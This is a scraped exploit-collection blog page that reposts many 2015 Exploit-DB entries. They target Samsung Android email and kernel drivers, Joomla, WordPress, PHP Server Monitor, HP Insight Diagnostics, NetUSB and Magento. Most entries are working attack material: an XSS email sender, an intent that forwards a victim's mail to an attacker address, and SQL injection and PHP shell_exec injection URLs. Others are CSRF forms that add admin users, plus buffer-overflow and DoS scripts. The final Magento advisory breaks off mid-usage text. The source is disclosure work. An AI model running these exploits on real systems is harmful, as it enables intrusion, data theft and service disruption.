Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863181649

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Source: https://code.google.com/p/google-security-research/issues/detail?id=494

'''
The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views a HTML email which contains HTML script tags or other events.

At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully. 

This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server.

Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed.
'''

#!/usr/bin/env python

import smtplib

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Change the details here appropriate to your configuration
me = "attacker@gmail.com"
me_password = "THIS IS NOT REAL"
you = "project.zero.test@gmail.com"
smtp_server = "smtp.gmail.com"

msg = MIMEMultipart('alternative')
msg['Subject'] = "Hello There!"
msg['From'] = me
msg['To'] = you

text = "Hello There!"
html = """\
<html>
  <head></head>
  <body>
   <p>
       <script>try { document.write(document.location); } catch(e) { document.write(e.message); }</script>
    </p>
  </body>
</html>
"""

part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')

msg.attach(part1)
msg.attach(part2)

s = smtplib.SMTP_SSL(smtp_server)
s.login(me, me_password)
s.sendmail(me, you, msg.as_string())
s.quit()
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=492

The Samsung Graphics 2D driver (/dev/fimg2d) is accessible by unprivileged users/applications. It was found that the ioctl implementation for this driver contains a locking error which can lead to memory errors (such as use-after-free) due to a race condition.

The key observation is in the locking routine definitions in fimg2d.h:

#ifdef BLIT_WORKQUE
#define g2d_lock(x)             do {} while (0)
#define g2d_unlock(x)           do {} while (0)
#define g2d_spin_lock(x, f)     spin_lock_irqsave(x, f)
#define g2d_spin_unlock(x, f)   spin_unlock_irqrestore(x, f)
#else
#define g2d_lock(x)             mutex_lock(x)
#define g2d_unlock(x)           mutex_unlock(x)
#define g2d_spin_lock(x, f)     do { f = 0; } while (0)
#define g2d_spin_unlock(x, f)   do { f = 0; } while (0)
#endif

This means that the g2d_lock/g2d_unlock routines are no-ops when BLIT_WORKQUE is defined, which appears to be the default configuration. Unfortunately the alternative spin lock routines are not used consistently with this configuration. For example, the FIMG2D_BITBLT_BLIT ioctl command (with notes annotated as "PZ"):

ctx = file->private_data; /* PZ: ctx allocated at open(), lives on the heap. */

switch (cmd) {
case FIMG2D_BITBLT_BLIT:

	mm = get_task_mm(current);
	if (!mm) {
		fimg2d_err("no mm for ctx\n");
		return -ENXIO;
	}

	g2d_lock(&ctrl->drvlock); /* PZ: This is a no-op. */

	ctx->mm = mm;

	ret = fimg2d_add_command(ctrl, ctx, (struct fimg2d_blit __user *)arg);
	if (ret) {
		...
	}

	ret = fimg2d_request_bitblt(ctrl, ctx); /* PZ: Does stuff with the ctx. */
	if (ret) {
		...
	}

	g2d_unlock(&ctrl->drvlock); /* PZ: Another no-op */

As the lock macros are no-ops, a second process can change ctx->mm when the original process is still using the same ctx->mm (as long as it has access to the same file descriptor).

Reproduction steps:
Open /dev/fimg2d
Fork to get two processes with different mm’s with the access to the fd
Concurrently call the FIMG2D_BITBLT_BLIT ioctl from both processes.
One ioctl should have valid data, the other should fail

At this point ctx->mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c)

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38557.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=491

The Exynos Seiren Audio driver has a device endpoint (/dev/seiren) that is accessible by either the system user or the audio group (such as the mediaserver). It was found that the write() implementation for this driver contains a buffer overflow vulnerability that overflow a static global buffer:

static ssize_t esa_write(struct file *file, const char *buffer,
                                        size_t size, loff_t *pos)
{
        struct esa_rtd *rtd = file->private_data;
        unsigned char *ibuf;
…
        ibuf = rtd->ibuf0;
...
        /* receive stream data from user */
        if (copy_from_user(ibuf, buffer, size)) {
                esa_err("%s: failed to copy_from_user\n", __func__);
                goto err;
        }

Note that the user supplied buffer and size parameters are not adequately bounds checked. The destination buffer is fixed size, so memory corruption can occur. A simple proof-of-concept from a privileged shell can be used to trigger the issue (tested on a Samsung S6 Edge):

# dd if=/dev/zero of=/dev/seiren count=5000000
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=490

The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content.

Service Action: com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND
Component: com.samsung.android.email.composer
Class Name: com.samsung.android.email.composer.service.QuickReplyService

The service takes a JSON encoded string with various additional parameters. We need to know two parameters, the email address of the local account and a message ID. We can guess a valid message ID (which just seems to be an incrementing number).

If we guess an invalid ID the service simply returns, but if we do get a valid ID the service seems to automatically create the reply email, attach an attacker supplied message as well as the contents of the original message and sends it to any email address you like. For example:

Intent intent = new Intent();
intent.setAction("com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND");
intent.setClassName("com.samsung.android.email.composer",
       "com.samsung.android.email.composer.service.QuickReplyService");
intent.putExtra("data", "{'original-msg-id':1, " +
       "'account-id':'project.zero.victim@gmail.com', " +
       "'msg':'Hello World!'," +
       "'title':'Hello Title'," +
       "'toList':'project.zero.attacker@gmail.com'}");
ComponentName name = MainActivity.this.startService(intent);

No permissions are required to send this service intent. If successfully sent this will show up in a "sent email" notification and will be present user’s sent email folder.
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=493

The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server

The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot:

static long m2m1shot_compat_ioctl32(struct file *filp,
                                unsigned int cmd, unsigned long arg)
{
...
        switch (cmd) {
        case COMPAT_M2M1SHOT_IOC_PROCESS:
        {
                struct compat_m2m1shot data;
                struct m2m1shot_task task;
                int i, ret;

                memset(&task, 0, sizeof(task));

                if (copy_from_user(&data, compat_ptr(arg), sizeof(data))) {
                        dev_err(m21dev->dev,
                                "%s: Failed to read userdata\n", __func__);
                        return -EFAULT;
                }

                ...
                for (i = 0; i < data.buf_out.num_planes; i++) {
                        task.task.buf_out.plane[i].len =
                                                data.buf_out.plane[i].len;
                        ...
                }

In this code snippet, the data.buf_out.num_planes value is attacker-controlled "u8" value, and is not bounds checked. However, task.task.buf_out.plane array is fixed in size (three elements), so a buffer overflow can occur during the loop shown above.

Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c).

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38555.zip
HireHackking 
source: https://www.securityfocus.com/bid/60426/info

Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Resin Professional 4.0.36 is vulnerable; other versions may also be affected. 

http://www.example.com/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/60447/info

HP Insight Diagnostics is prone to a remote code-injection vulnerability.

An attacker can exploit this vulnerability to inject and execute arbitrary code within the context of the affected application.

HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected.

https://www.example.com/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes
HireHackking 
source: https://www.securityfocus.com/bid/60449/info

HP Insight Diagnostics is prone to a local file include vulnerability because it fails to adequately validate user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.

HP Insight Diagnostics 9.4.0.4710 is vulnerable; other versions may also be affected. 

https://www.example.com/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html
HireHackking 
source: https://www.securityfocus.com/bid/60426/info
 
Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 
Resin Professional 4.0.36 is vulnerable; other versions may also be affected. 

http://www.example.com/resin-admin/?q=index.php&logout=true%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
# Description of the component:
Reach, engage and delight more customers with newsletters, auto-responders
or campaign management.

##################################################################################################
# Exploit Title: [Joomla component com_jnews - SQL injection]
# Google Dork: [inurl:option=com_jnews]
# Date: [2015-10-29]
# Exploit Author: [Omer Ramić]
# Twitter: https://twitter.com/sp_omer
# Vendor Homepage: [http://www.joobi.co/]
# Software Link: [
http://www.joobi.co/index.php?option=com_content&view=article&id=8652&Itemid=3031
]
# Version: [8.5.1] & probably all prior
# Tested on: Linux/Windows/PHP 5.5.28/Apache 2.4.16
##################################################################################################

#Vulnerable POST parameter:
Parameter_1: sub_list_id[1] (This parametar needs to be encoded when
exploited as: sub_list_id%5B1%5D)


#The vulnerable parameter is within the following request:

POST /joomlatest/index.php?option=com_jnews HTTP/1.1
Host: 192.168.0.10
User-Agent: Hidden-user-agent-version
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://192.168.0.10/joomlatest/index.php?option=com_jnews&view=subscribe&act=subone&Itemid=206
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 318

Itemid=188&name=asdf&email=asdf%40asdf.com
&receive_html=0&timezone=00%3A00%3A00&confirmed=1&subscribed%5B1%5D=0&sub_list_id%5B1%5D=1&acc_level%5B1%5D=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1





#Vector:
sub_list_id%5B1%5D=1[SQLi]



POC_1: boolean-based blind
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1
RLIKE (SELECT (CASE WHEN (7097=7097) THEN 1 ELSE 0x28
END))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1

POC_2: error-based
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=1
AND EXTRACTVALUE(8483,CONCAT(0x5c,0x716b787671,(SELECT
(ELT(8483=8483,1))),0x716b786b71))&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1

POC_3: AND/OR time-based blind
Itemid=188&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=1&subscribed[1]=0&sub_list_id[1]=(SELECT
* FROM
(SELECT(SLEEP(5)))Qrax)&acc_level[1]=29&passwordA=0oYmqypNqP6eU&fromFrontend=1&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=188&d65abd4ca0e24f5d3e5af6b5c390ae17=1



###################################
# Greets to Palestine from Bosnia          #
###################################

Good Luck ^__^
HireHackking 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title		: Sam Spade 1.14 Scan from IP address Field SEH Overflow Crash PoC
# Discovery by		: Luis Martínez
# Email			: l4m5@hotmail.com
# Discovery Date	: 20/10/2015
# Vendor Homepage	: http://samspade.org
# Software Link		: http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version	: 1.14
# Vulnerability Type	: Denial of Service (DoS) Local
# Tested on OS		: Windows XP Professional SP3 x86 es
# Crash Point		: Go to Tools > Scan addresses field > Enter the contents of 'samspade_1.14_BoF.txt' > OK
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this: 
# 0012EBE0 43434343
# 42424242 *** CORRUPT ENTRY ***
 
# And the Stack
 
#0012EBD0   41414141  AAAA
#0012EBD4   41414141  AAAA
#0012EBD8   41414141  AAAA
#0012EBDC   41414141  AAAA
#0012EBE0   42424242  BBBB  Pointer to next SEH record
#0012EBE4   43434343  CCCC  SE handler
 
# And the Registers
 
#EAX 00000001
#ECX 00000001
#EDX 00140608
#EBX 00000000
#ESP 0012EBD0 ASCII "AAAAAAAAAAAAAAAABBBBCCCC - "
#EBP 41414141
#ESI 00C2BD00
#EDI 00E89DB0
#EIP 41414141

buffer = "\x41" * 531
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("samspade_1.14_BoF.txt", "w")
f.write(buffer+nseh+seh)
f.close()
HireHackking 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: NetUSB Kernel Stack Buffer Overflow
# Date: 9/10/15
# Exploit Author: Adrian Ruiz Bermudo
# Vendor Homepage: http://www.kcodes.com/
# Version: Multiple: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt
# Tested on: NETGEAR DC112A
# CVE : CVE-2015-3036

import socket
import sys
import random
import string
import time
import struct
from Crypto.Cipher import AES #pip install pycrypto

DOS_BYTES = 128	#BoF
TIMEOUT = 5
RECV_SIZE = 16
PORT_DEFAULT = 20005

AESKey = "\x5c\x13\x0b\x59\xd2\x62\x42\x64\x9e\xd4\x88\x38\x2d\x5e\xae\xcc"

print "#"
print "# Exploit KCodes NetUSB | Kernel Stack Buffer Overflow | Denial of Service (DoS)"
print "# CVE-2015-3036"
print "# Found by: Stefan Viehböck (Office Vienna) | SEC Consult Vulnerability Lab | https://www.sec-consult.com"
print "# Exploit author: Adrián Ruiz Bermudo | @funsecurity | http://www.funsecurity.net"
print "# Advisory: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt"
print "#"
print ""

if len(sys.argv) >= 2:
	try:
		target = sys.argv[1]
		try:
			port = int(sys.argv[2])
		except Exception as detail:
			port = PORT_DEFAULT
		
		#Inicialización de la conexión.
		init = "\x56\x05"
		#Datos aleatorios para el handshake
		randomData = "".join(random.choice(string.lowercase) for i in range(RECV_SIZE))
		#Nombre del equipo con 128 carácteres para provocar DoS.
		computerName = "".join(random.choice(string.lowercase) for i in range(DOS_BYTES))
		#Longitud del nombre del equipo - "\x80\x00\x00\x00"
		lengthComputerName = struct.pack("i", DOS_BYTES);
		#Sync - "\x07\x00\x00\x00"
		syncOK = struct.pack("i", 7);
		#Finalización de la conexión.
		end = "\x01"

		encryption_suite = AES.new(AESKey, AES.MODE_ECB, "")
		randomDataCrypt1 = encryption_suite.encrypt(randomData)

		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		sock.settimeout(TIMEOUT)

		print "Conectando:", target,":",port
		sock.connect((target, port))
		print "Conectado"
		print "----------------"

		print "Inicializando:", init.encode("hex")
		sock.send(init)
		print "Random data para cifrar por el servidor:", randomData.encode("hex")
		sock.send(randomData)
		print "----------------"

		result = sock.recv(RECV_SIZE)
		print "Random data cifrados por el servidor:", result.encode("hex")
		print "Random data cifrados por el cliente:", randomDataCrypt1.encode("hex")
		if (randomDataCrypt1 == result):
			print "Handshake OK"
			randomData = sock.recv(RECV_SIZE)
			print "Random data a cifrar por el cliente:", randomData.encode("hex")
			randomDataCrypt2 = encryption_suite.encrypt(randomData)
			print "Random data cifrados por el cliente:", randomDataCrypt2.encode("hex")
			print "----------------"
			sock.send(randomDataCrypt2)
			print "Tamanio del nombre del host a parear:", lengthComputerName.encode("hex")
			sock.send(lengthComputerName)
			print "Nombre del host a parear:", computerName.encode("hex")
			sock.send(computerName)
			print "----------------"

			print "Sync: ", syncOK.encode("hex")
			sock.send(syncOK)
			if (sock.recv(RECV_SIZE) == syncOK):
				print "Sync ok"
				sock.send(end)
				try:
					#Esperamos unos segundos antes de conectar
					time.sleep(TIMEOUT)
					#Comprobamos si el dispositivo sigue vivo...
					sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
					sock.settimeout(TIMEOUT)
					sock.connect((target, port))
					print "No vulnerable"
				except Exception as detail:
					print "Vulnerable, exploit OK"
			else:
				print 'Sync error.'
	except Exception as detail:
		print "Error de comunicación:", detail
else:
	print "Usage:", sys.argv[0], "target [port]"
HireHackking 
source: https://www.securityfocus.com/bid/60455/info

Max Forum is prone to multiple input-validation vulnerabilities including a PHP code-execution vulnerability, a local file-include vulnerability and an information-disclosure because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to inject arbitrary PHP code and include and execute arbitrary files from the vulnerable system in the context of the affected application and to obtain sensitive information that may aid in further attacks.

Max Forum 2.0.0 is vulnerable; other versions may also be affected. 

PHP code-execution:

POST /Max/install/install.php?step=4 HTTP/1.1
Host: www.example
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example/Max/install/install.php?step=3
Cookie: exp_lang=en; language=english; max_name=admin; max_password=2d6df19ab196f1c344310e0021239a06; lang=en_US; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 179
mysql_host=www.example&mysql_login=root&mysql_pass=toor&mysql_database=max&db_prefix=max_%22%3Bphpinfo%28%29%3B%2F%2F&site_address=http%3A%2F%2Fwww.example%2FMax%2F&step=4&prev_step=3

Local file-include:

GET /Max/install/ HTTP/1.1
Host: www.example
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: language=../../phpinfo; lang=en_US; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97
Connection: keep-alive

Information-disclosure:

GET /Max/index.php?forum=2 HTTP/1.1
Host: www.example
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: max_name=admin; max_password=dfbb72b7a33b97abda905a4af7e6c7f5; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97; lang=
Connection: keep-alive
HireHackking 
source: https://www.securityfocus.com/bid/60458/info

The Ambience theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/wp-content/themes/ambience/thumb.php?src=<body onload=alert(/darksnipper/)>.jpg
HireHackking 
source: https://www.securityfocus.com/bid/60461/info

ScriptCase is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/scelta_categoria.php?categoria=[SQLi]
HireHackking 
source: https://www.securityfocus.com/bid/60488/info

mkCMS is prone to an arbitrary PHP code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary PHP code within the context of the affected application.

mkCMS 3.6 is vulnerable; other versions may also be affected. 

http://www.example.com/mkCMS/index.php?cmd=dir
HireHackking 
source: https://www.securityfocus.com/bid/60459/info

Lokboard is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Lokboard 1.1 is vulnerable; other versions may also be affected. 

POST /lokboard/install/index_4.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lokboard/install/index_3.php?error=1
Cookie: lang=; PHPSESSID=g4j89f6110r4hpl3bkecfpc7c1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();//
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt


Vendor:
================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download


Product:
================================
PHP Server Monitor 3.1.1


Vulnerability Type:
=================================
Cross site request forgery (CSRF)


Vulnerability Details:
=====================

Multiple CSRF issues in PHP Server Monitor allow remote attackers to add
arbitrary users & servers to the system, modify system configurations
and delete arbitrary servers, if user (admin) is logged in and visits our
malicious website or clicks on our infected linxs. As no CRSF protection is
used in the application, we can make request on the victims behalf an the
server will happily oblige processing our malicous HTTP requests.


Exploit code(s):
===============

<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>


1) add arbitrary users to the system:

<form id="HELL" action="
http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=0"
method="post">
<input type="text" name="user_name" value="hyp3rlinx" >
<input type="text" name="name" value="hyp3rlinx">
<input type="text" name="level" value="20">
<input type="text" name="password" value="abc123">
<input type="text" name="password_repeat" value="abc123">
<input type="text" name="email" value="ghostofsin@abyss.com">
<input type="text" name="mobile" value="">
<input type="text" name="pushover_key" value="">
<input type="text" name="pushover_device" value="">
</form>



2) add arbitrary servers to the system:

<form id="HELL" action="
http://localhost/phpservermon-3.1.1/?&mod=server&action=save&id=0&back_to="
method="post">
<input type="text" name="label" value="HELL" >
<input type="text" name="ip" value="malicious-domain.hell">
<input type="text" name="type" value="service">
<input type="text" name="port" value="666">
<input type="text" name="pattern" value="">
<input type="text" name="warning_threshold" value="1">
<input type="text" name="timeout" value="">
<input type="text" name="active" value="yes">
<input type="text" name="email" value="yes">
<input type="text" name="sms" value="yes">
<input type="text" name="pushover" value="yes">
</form>


3) modify system configuration:

<form id="HELL" action="
http://localhost/phpservermon-3.1.1/index.php?mod=config&action=save"
method="post">
<input type="text" name="language" value="en_US" >
<input type="text" name="show_update%5B%5D=" value="on">
<input type="text" name="auto_refresh_servers" value="0">
<input type="text" name="alert_type" value="status">
<input type="text" name="log_status%5B%5D" value="on">
<input type="text" name="log_retention_period" value="1">
<input type="text" name="email_status%5B%5D" value="on">
<input type="text" name="log_email%5B%5D" value="on">
<input type="text" name="email_from_name" value="ghostofsin">
<input type="text" name="email_from_email" value="abysmalgodz@abyss.com">
<input type="text" name="email_smtp_port" value="25">
<input type="text" name="email_smtp_security" value="">
<input type="text" name="email_smtp_username" value="">
<input type="text" name="email_smtp_password" value="">
<input type="text" name="test_email" value="1">
<input type="text" name="log_sms%5B%5D" value="on">
<input type="text" name="sms_gateway" value="whatever">
<input type="text" name="sms_gateway_username" value="username">
<input type="text" name="sms_gateway_password" value="password">
<input type="text" name="sms_from" value="1234567890">
<input type="text" name="test_sms" value="0">
<input type="text" name="sms_from" value="1234567890">
<input type="text" name="log_pushover%5B%5D" value="0">
<input type="text" name="pushover_api_token" value="">
<input type="text" name="test_pushover" value="0">
</form>

</body>
</html>


4) arbitrary server deletion via GET request:

http://localhost/sectest/phpservermon-3.1.1/?&mod=server&action=delete&id=2


Exploitation Technique:
=======================
Remote


Severity Level:
=========================================================
High


Disclosure Timeline:
=========================================================
Vendor Notification: NA
Oct 30, 2015  : Public Disclosure


Description:
==========================================================


Request Method(s):              [+]  GET / POST


Vulnerable Product:             [+]  PHP Server Monitor 3.1.1



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
=============================================
- Release date: 29.10.2015
- Discovered by: Dawid Golunski
- Severity: High/Critical
- eBay Magento ref.: APPSEC-1045
=============================================

 
I. VULNERABILITY
-------------------------

eBay Magento CE <= 1.9.2.1       XML eXternal Entity Injection (XXE) on PHP FPM
eBay Magento EE <= 1.14.2.1      

 
II. BACKGROUND
-------------------------

- eBay Magento eCommerce

http://magento.com/

"More than 240,000 merchants worldwide put their trust in our eCommerce 
software. Magento's eCommerce platform gives you the tools you need to attract 
more prospects, sell more products, and make more money. It's what we do.

We're owned by eBay, so you know we're eCommerce experts"


- PHP FPM

http://php.net/manual/en/install.fpm.php

"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with
 some additional features (mostly) useful for heavy-loaded sites."

Starting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI 
process manager into its codebase. 

 
III. INTRODUCTION
-------------------------

eBay Magento eCommerce application uses Zend Framework which has a 
vulnerability that allows for XML eXternal Entity injection in applications
served with PHP FPM.

XXE (XML eXternal Entity) attack is an attack on an application that parses XML 
input from untrusted sources using incorrectly configured XML parser. 
The application may be forced to open arbitrary files and/or network resources.
Exploiting XXE issues on PHP applications may also lead to denial of service or
in some cases (e.g. when an 'expect' PHP module is installed) lead to command 
execution.


IV. DESCRIPTION
-------------------------
 
The aforementioned XXE vulnerability in Zend Framework which affects eBay 
Magento, was assigned a CVE-ID of CVE-2015-5161 and can be found in a 
separate advisory at:

http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt

In short, the Zend Framework XXE vulnerability stems from an insufficient 
sanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP 
applications. 
By using certain multibyte encodings within XML, it is possible to bypass 
the sanitisation and perform certain XXE attacks.

Since eBay Magento is based on Zend Framework and uses several of its XML
classes, it also inherits this XXE vulnerability.

The vulnerability in Zend affects all its XML components, however there 
are two vulnerable Zend Framework vulnerable components:

 - Zend_XmlRpc_Server 
 - Zend_SOAP_Server 

that are of special interest to attackers as they could be exploited remotely 
without any authentication. 

Magento implements a store API providing XML/SOAP web services. 
Although the Zend_XmlRpc is present within Magento code base, the testing 
revealed that an older Zend class was used for its implementation, which is
not vulnerable.

However, further testing revealed that Magento SOAP API was implemented using
the Zend_SOAP_Server class from Zend Framework, which is vulnerable to the 
XXE injection vulnerability discovered earlier.

 
V. PROOF OF CONCEPT
-------------------------
 
Normally, when an XML containing entities is supplied to magento SOAP API, the
following message gets produced:

<SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Sender</faultcode>
<faultstring>Detected use of ENTITY in XML, disabled to prevent XXE/XEE 
attacks</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope> 

Below is a POC exploit that automates the steps necessary to bypass this
protection on Magento served with PHP-FPM, and remotely exploit the XXE issue 
in Magento's SOAP API without authentication.
Authentication is not required for the exploitation, as Magento first needs to
load the malicious XML data in order to read credentials within the SOAP 
login method. Loading malicious XML may be enough to trigger attacker's payload
within the entities (in case of libxml2 library auto-expanding entities).


---[ magento-soap-exploit.sh ]---

#!/bin/bash
#
# POC Exploit (v1.1)
#
# eBay Magento CE  <= 1.9.2.1  XML eXternal Entity Injection (XXE) on PHP-FPM
# eBay Magento EE  <= 1.14.2.1
#
# CVE-2015-5161
#
# Credits:
#
# Dawid Golunski
# dawid (at) legalhackers.com
# http://legalhackers.com
#
# Advisories:
#
# http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt
# http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
#
# Usage:
#
# [Vulnerability test]
#
# This is to test the vulnerability with a simple XXE payload which retrieves the
# /dev/random file and causes a time out. No receiver server is required in this
# test as no data is returned.
#
# Run the script with just the URL to Magento SOAP API, with no other parameters. 
# E.g:
